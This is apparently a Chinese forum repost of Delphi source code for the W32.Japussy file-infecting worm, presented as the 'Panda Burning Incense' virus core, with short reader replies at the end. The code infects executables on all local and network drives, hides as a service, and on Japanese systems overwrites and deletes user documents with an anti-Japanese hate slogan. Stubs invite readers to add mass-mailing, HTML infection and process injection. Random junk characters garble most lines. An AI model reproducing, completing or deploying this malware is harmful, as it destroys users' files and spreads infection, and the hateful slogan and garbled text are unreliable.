熊猫烧香核心源码(转）

program Japussy; >DxHavqJ
uses !pdOTf9
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; q#zdj R(
const + _FWL
HeaderSize = 82432;         //病毒体的大小 NbY{6cv
IconOffset = $12EB8;       //PE文件主图标的偏移量 8w*n D
LH*6SF T$k
//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同 7R){P*9o
//查找2800000020的十六进制字符串可以找到主图标的偏移量 5gy(DH
y
zjZg lO~q,
{ \'e9T:uo.b
HeaderSize = 38912;         //Upx压缩过病毒体的大小 bW_`:

IconOffset = $92BC;         //Upx压缩过PE文件主图标的偏移量 gkuxb$
aw;+onI
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe B8UI4f
} cZ E95}RL
IconSize   = $2E8;         //PE文件主图标的大小--744字节 Fo92T3hp
IconTail   = IconOffset + IconSize; //PE文件主图标的尾部  (.f L
ID     = $44444444;       //感染标记 tU\\e^+S!
j>^dd{G!
//垃圾码，以备写入 !*M=C]S
Catchword = \'If a race need to be killed out, it must be Yamato. \' + wyML*/i~#
    \'If a country need to be destroyed, it must be Japan! \' + I yj &)
    \'*** W32.Japussy.Worm.A ***\'; qB+M-d7
{$R *.RES} C%8dL|~_0
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; |}2l U|+2
stdcall; external \'Kernel32.dll\'; //函数声明 $<[KR $A
var V\\H
+ [
TmpFile: string; H?r |{. 
Si:   STARTUPINFO; ^J3^H/B=Q
Pi:   PROCESS_INFORMATION; N^j3n>!K
IsJap:   Boolean = False; //日文操作系统标记 3h7f F!
{ 判断是否为Win9x } j}[R&
function IsWin9x: Boolean; d10[p[n4j
var >V^hHb.S
Ver: TOSVersionInfo; xzTdxa0
begin Eq` !]_gJ
Result := False; M,Ka0W
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); _\"_u G^&
if not GetVersionEx(Ver) then y /t{zV\\zx
Exit; }p]=p f41
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x <`4Y7z6 :
Result := True; Q\\ztl7I
end; `tyj.^uP
{ 在流之间复制 } 5HBO Y
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; gw3KbCy
dStartPos: Integer; Count: Integer); GD ,0KtY
var uO+ryPM[$
sCurPos, dCurPos: Integer; ?<k=\'&!5b
begin BfO&,t#tN,
sCurPos := Src.Position; ix\\eOkA
dCurPos := Dst.Position; H!7e1tP\\2
Src.Seek(sStartPos, 0);
)Fy *&
Dst.Seek(dStartPos, 0); :q(-*
Dst.CopyFrom(Src, Count); 
[=S,gN
Src.Seek(sCurPos, 0);  (/\\Ksx
Dst.Seek(dCurPos, 0); TllW4~A
end; M
% Cgq
{ 将宿主文件从已感染的PE文件中分离出来，以备使用 } h}MKMk
procedure ExtractFile(FileName: string); {e>I1#s>u,
var -Cr>O|!,.
sStream, dStream: TFileStream; o#GM^q\\/`
begin gUAAndZ-x_
try vO/5V@jn
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); 2U;)qCa
try WZla,./
  dStream := TFileStream.Create(FileName, fmCreate); zcwF
  try O`x0 P2
  sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分 3Qx_5
1f^
  dStream.CopyFrom(sStream, sStream.Size - HeaderSize); twz&oJ%
  finally &C>DoY
  dStream.Free; r?nD$J
  end; $N=:=}
finally GA@< m`
  sStream.Free; `\' iB/
end; olX7?P0
except FaL5Op#
end; GX$\'CncLiE
end; .VF<+eB[m
{ 填充STARTUPINFO结构 } j+ X>f
0v
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); y%SrU%1{h
begin aM7P3U
Si.cb := SizeOf(Si); )~[L i#qm
Si.lpReserved := nil; AelkpJ
Si.lpDesktop := nil; Ly$ 4u7Tf
Si.lpTitle := nil; >=;C~?8S
Si.dwFlags := STARTF_USESHOWWINDOW; s{?gpZH
Si.wShowWindow := State; U#zrZ N&
Si.cbReserved2 := 0; NS$s{zR##
Si.lpReserved2 := nil; kzgR[.w(
end; o@B21x
{ 发带毒邮件 } hmh*] RR
procedure SendMail; J0$`Ysl
begin 0X\'JIJNK
//哪位仁兄愿意完成之？ A+XuMms
end; kn. u/1
{ 感染PE文件 } bbpGFBS(
procedure InfectOneFile(FileName: string); D8~6, }2s
var yf n`Y wN
HdrStream, SrcStream: TFileStream; \\Bx}6Jb
IcoStream, DstStream: TMemoryStream; \"~05\"j
iID: LongInt; vUwRe->>G
aIcon: TIcon; LuEF
Infected, IsPE: Boolean; 9fV{|b^8
i: Integer; G{_qM3nD
Buf: array[0..1] of Char; 8u7& nr
begin Y[_/gBy@
try //出错则文件正在被使用，退出 z\\},s&
if CompareText(FileName, \'JAPUSSY.EXE\') = 0 then //是自己则不感染 w wzrUi
  Exit; GB5iP&N]W
Infected := False; (hYZniM
IsPE   := False; [ 3_N(/2h
SrcStream := TFileStream.Create(FileName, fmOpenRead); T(ef|{.
try X*t@[v\'#
  for i := 0 to $108 do //检查PE文件头 /|Y&/#ZErP
  begin }Q S U/|
  SrcStream.Seek(i, soFromBeginning); k@c9wD#%
  SrcStream.Read(Buf, 2); 2 K.tAl<,B
  if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记 psG(F2\"%
  begin uYb [02
    IsPE := True; //是PE文件 K{z nxxo
    Break; Mx2k5xO?
  end; $NC#cOs:
  end; QsrRc%WM
  SrcStream.Seek(-4, soFromEnd); //检查感染标记 4XWe2LxA\'
  SrcStream.Read(iID, 4); 7X<HA D
  if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染 P|~6G/=i
  Infected := True; M8o F@}/
finally {FV%%U
  SrcStream.Free; viOzG0 )
L
end; OrS~LOj0zc
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出 d-=\',p1xV.
  Exit; hsh\\\'3mg
IcoStream := TMemoryStream.Create; )%o,7j
DstStream := TMemoryStream.Create; gOB$kp
try \"IqR1OtS
  aIcon := TIcon.Create; 1 5YS8\\`
  try 8}\\.=<\\vP
  //得到被感染文件的主图标(744字节)，存入流 $t3kM-
  aIcon.ReleaseHandle; XIs|D+uQg
  aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0); ! !.zZ@Hx
  aIcon.SaveToStream(IcoStream); ~:ute2y
  finally
J`>2pcw
  aIcon.Free; pkKc2r l
  end; Xb_4 DJi
  SrcStream := TFileStream.Create(FileName, fmOpenRead); (rt-g;
  //头文件 
6Wb8|4
  HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); 9/9T8IpR$
  try N4@5 +HJ-
  //写入病毒体主图标之前的数据 [) JWSJ
  CopyStream(HdrStream, 0, DstStream, 0, IconOffset); YIN]_kV~/R
  //写入目前程序的主图标 h#cN_g^>
  CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize); i Tnt\\%
  //写入病毒体主图标到病毒体尾部之间的数据 e$6]Tz (
  CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail); ;w;:Vp_
  //写入宿主程序 |=_)C3~!
  CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size); 162`R[W
  //写入已感染的标记 5X; GfR?
  DstStream.Seek(0, 2); ]=b8g\'Ly)
  iID := $44444444; v w~s[(
  DstStream.Write(iID, 4); ]aJI
  finally pA\"u4
  HdrStream.Free;  xH2U
  end; (~~jD
finally y43<JwY
  SrcStream.Free; i#V5]o
  IcoStream.Free; +>l|`gw
  DstStream.SaveToFile(FileName); //替换宿主文件 3KagX=!O<
  DstStream.Free; /ZJ WBmyd
end;  k=3:![
except; `o|G.c
end; q$C >~
end; lV o
{ 将目标文件写入垃圾码后删除 } ,d:`VUDd3
procedure SmashFile(FileName: string); M,\'y n _
var IeJ=|R
FileHandle: Integer; qx*wNJe
i, Size, Mass, Max, Len: Integer; b8uD#>*`q
begin tZ*c*3J
try |j Zo(Lds
SetFileAttributes(PChar(FileName), 0); //去掉只读属性 7Calja +
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件 hZyIU)gSw
try {<9He^I#
  Size := GetFileSize(FileHandle, nil); //文件大小 *jSu|(*7C
  i := 0; %jYT2A$
  Randomize; ~JNe0{ {!
  Max := Random(15); //写入垃圾码的随机次数 : I\'gZvGU
  if Max < 5 then {~PG{lS5
  Max := 5; Qq-m#Yu^$j
  Mass := Size div Max; //每个间隔块的大小 E|!XVzl
  Len := Length(Catchword); A%Lv60
  while i < Max do p v8C,3
  begin em4m\' \\
  FileSeek(FileHandle, i * Mass, 0); //定位 4y 4<z0v
  //写入垃圾码，将文件彻底破坏掉 Nw{V f!
  FileWrite(FileHandle, Catchword, Len); 0Jum{8p 2
  Inc(i); OKgL$dF\\
  end; abA!?- x
finally 1;8;H,/15%
  FileClose(FileHandle); //关闭文件 *R?sNmz
end; FIV{J.a}E
DeleteFile(PChar(FileName)); //删除之 L
ZuKbc
except  l+G&M%
end; Lz ]Z52ah
end; m=L3>;o$
{ 获得可写的驱动器列表 } G%S,R_]K
function GetDrives: string; \'Y7F$(SaG
var &x|\'5{!y>
DiskType: Word; @IE ex-
D: Char; !%GDlK%
Str: string; +a sTu><#Q
i: Integer; #!`.Xo?1
begin m2n$EO
for i := 0 to 25 do //遍历26个字母 voXL1r
begin W/CfIhnN
D := Chr(i + 65); \'M<$+HZL
Str := D + \':\\\'; d gi>TVj
DiskType := GetDriveType(PChar(Str)); !\\HG<B= q
//得到本地磁盘和网络盘 C,t+-Hnd
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then j\"Q!a3:+q
  Result := Result + D; 2m%b*IIs
end; =sd FQo`A
end; 4)(.LbIs{&
{ 遍历目录，感染和摧毁文件 } ~.A4_OIq
procedure LoopFiles(Path, Mask: string); hf
82
var >+gi61$
i, Count: Integer; Y:gK;6#
Fn, Ext: string; =3$z\'w &<
SubDir: TStrings;
T,?g IJ1
SearchRec: TSearchRec; l~!XdJ4
Msg: TMsg; .rj82yi
function IsValidDir(SearchRec: TSearchRec): Integer; P4 r\'#c
begin #0X, #u.
if (SearchRec.Attr <> 16) and (SearchRec.Name <> \'.\') and l%%9OC]\'
  (SearchRec.Name <> \'..\') then Xb+XB
  Result := 0 //不是目录 \'=7J!|y1}
else if (SearchRec.Attr = 16) and (SearchRec.Name <> \'.\') and 5AA./}5U
  (SearchRec.Name <> \'..\') then ara1@\"h1U
  Result := 1 //不是根目录 4#J gjzoI
else Result := 2; //是根目录 # d&s
end; `VjEd
begin E~;FC+Vf(
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then Uu`@x?
begin OC K/`#w&
repeat wGJv&6O
  PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免引起怀疑 jssTI
tJu
  if IsValidDir(SearchRec) = 0 then T_k&[x
  begin ,0\\ GU;(y
  Fn := Path + SearchRec.Name; 9ENW[+F
  Ext := UpperCase(ExtractFileExt(Fn)); 9cc=z@l
  if (Ext = \'.EXE\') or (Ext = \'.SCR\') then )T?YiNL
  begin 4j>*J5\'-
    InfectOneFile(Fn); //感染可执行文件   }R{3~N$5V
  end *29YyU%
  else if (Ext = \'.HTM\') or (Ext = \'.HTML\') or (Ext = \'.ASP\') then ;[as^P
  begin GwapCRhjh
    //感染HTML和ASP文件，将Base64编码后的病毒写入 =
]fYi6O
    //感染浏览此网页的所有用户 NHd5%: n
    //哪位大兄弟愿意完成之？ %}=3;7
  end 50/5`AkL
  else if Ext = \'.WAB\' then //Outlook地址簿文件 w\' ;{pxf.
  begin W`;@ (M9
    //获取Outlook邮件地址 hU,DP i}
  end Mzn. >
  else if Ext = \'.ADC\' then //Foxmail地址自动完成文件 (7V>IsO66
  begin OpG#<|a
    //获取Foxmail邮件地址 X7J 6nuI
  end H`>&A=if:
  else if Ext = \'IND\' then //Foxmail地址簿文件
JL#KtwB0
  begin dRso
F7
    //获取Foxmail邮件地址 iL lJsGh^R
  end %Q#@RwA+
  else R}< S4,=E
  begin Q V,f-[9
    if IsJap then //是倭文操作系统 D[[ WBJS
    begin ]f -)4D.
    if (Ext = \'.DOC\') or (Ext = \'.XLS\') or (Ext = \'.MDB\') or  H?nqmV
    (Ext = \'.MP3\') or (Ext = \'.RM\') or (Ext = \'.RA\') or A bv&[V
    (Ext = \'.WMA\') or (Ext = \'.ZIP\') or (Ext = \'.RAR\') or puau$k
    (Ext = \'.MPEG\') or (Ext = \'.ASF\') or (Ext = \'.JPG\') or :Z ,9Y
    (Ext = \'.JPEG\') or (Ext = \'.GIF\') or (Ext = \'.SWF\') or .!?9 3Q
    (Ext = \'.PDF\') or (Ext = \'.CHM\') or (Ext = \'.AVI\') then : C`Av|f
      SmashFile(Fn); //摧毁文件 @&5[LiW
    end; 7.WA\\Rq%
  end; V4YuZR
  end; u~XE *Vb
  //感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑 jLXl boww_
  Sleep(200); Hb~\"ki![
until (FindNext(SearchRec) <> 0); m/p.OpoE
end; N
xFM*
FindClose(SearchRec); ZtzdRJ
SubDir := TStringList.Create; iv<+2XZ3
if (FindFirst(Path + \'*.*\', faDirectory, SearchRec) = 0) then K?-0JkM}
begin #rybNpyV
repeat Y!%`vq; %
  if IsValidDir(SearchRec) = 1 then kZH.lkB$TH
  SubDir.Add(SearchRec.Name); #ewa _@9
until (FindNext(SearchRec) <> 0); n_L/c*dw
end; Cj%ZN +
FindClose(SearchRec);  1gj t9
Count := SubDir.Count - 1; vTDLeaP?
for i := 0 to Count do p:sQ\\R+}}
LoopFiles(Path + SubDir.Strings + \'\\\', Mask); jc,I{F.+
FreeAndNil(SubDir); Q\'Gy
end; sqP&
1
{ 遍历磁盘上所有的文件 } OoRTm-X*FH
procedure InfectFiles; I ;xB Rm#
var ,$A&j6aE
DriverList: string; Goeo[^W_Z
i, Len: Integer; \"
7ne
Ax
begin ig?r2+_A
if GetACP = 932 then //日文操作系统 2*>euD j,S
IsJap := True; //DriverList := GetDrives; //得到可写的磁盘列表 `2 1HH\'
Len := Length(DriverList); {I(Na1y%2
while True do //死循环 /[u@fSt9s
begin dXGKqz1^
for i := Len downto 1 do //遍历每个磁盘驱动器 Df 8%\'
  LoopFiles(DriverList + \':\\\', \'*.*\'); //感染之 2b0 <RH]
SendMail; //发带毒邮件 ]N D9SD7f
Sleep(1000 * 60 * 5); //睡眠5分钟 #]B>M,\"@?
end; TXedc9P
end; )J, U qE
{ 主程序开始 } R3zEYK
begin b km%`/
if IsWin9x then //是Win9x M~2Z@*H
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程 \')hlY`S7
else //WinNT 1G]-9(L>Q
begin \"Vb^qlv~$d
//远程线程映射到Explorer进程 ,3\\&<x{!S
//哪位兄台愿意完成之？ +VA ~*tU
end; <^s.>Gt{}.
//如果是原始病毒体自己 a}zz~n
if CompareText(ExtractFileName(ParamStr(0)), \'Japussy.exe\') = 0 then E*WEh*
InfectFiles //感染和发邮件 a3iA*}1K
else //已寄生于宿主程序上了，开始工作 iS,\'v[\'>
begin sXE$s%P
TmpFile := ParamStr(0); //创建临时文件 #dbNGb7J 
Delete(TmpFile, Length(TmpFile) - 4, 4); UFrx^Os+k
TmpFile := TmpFile + #32 + \'.exe\'; //真正的宿主文件，多一个空格 N^x~`sO
ExtractFile(TmpFile); //分离之 j|# jgBA!
FillStartupInfo(Si, SW_SHOWDEFAULT);   6~\\(
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, g$\"D|8A
  0, nil, \'.\', Si, Pi); //创建新进程运行之  L

InfectFiles; //感染和发邮件 ` ;-n| kF
end; QAJW}P1
end.

很快又会有各种各样的变种......::12::

对这个不懂！::11::

看的好晕~ 官方发布的吧~?